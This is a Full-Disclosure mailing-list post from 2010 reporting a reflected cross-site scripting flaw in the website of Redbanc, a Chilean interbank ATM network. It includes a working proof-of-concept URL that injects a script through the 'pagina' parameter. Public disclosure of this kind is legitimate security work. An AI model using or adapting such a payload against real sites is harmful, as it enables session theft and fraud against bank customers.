[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] XSS vulnerability in RedBanc.cl (interbank network)

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] XSS vulnerability in RedBanc.cl (interbank network)
From: "Zerial." <fernando@xxxxxxxxxx>
Date: Thu, 25 Feb 2010 11:29:39 -0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Redbanc is an interbank network[0] in Chile connecting the ATMs of 21 banks.

Site: http://www.redbanc.cl
XSS:
http://www.redbanc.cl/portal_redbanc/browse?pagina=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

PoC and more information (spanish):
http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/


[0] http://en.wikipedia.org/wiki/Interbank_network

- -- 
Fernando A. Lagos Berardi - Zerial
Desarrollador y Programador Web
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Skype: erzerial
Jabber: zerial@xxxxxxxxxxxx
GTalk: fernando@xxxxxxxxxx

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkuGiVMACgkQIP17Kywx9JSK4QCeJXD9NFlbEfD07/UshS8me7VI
WHEAni/nC+KM5X7b5ueKfxhBrTd7F/LA
=uwc+
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] SQL injection vulnerability in WebAdministrator Lite CMS
Next by Date: [Full-disclosure] SQL injection vulnerability in LiveChatNow
Previous by thread: [Full-disclosure] SQL injection vulnerability in WebAdministrator Lite CMS
Next by thread: [Full-disclosure] SQL injection vulnerability in LiveChatNow
Index(es):
- Date
- Thread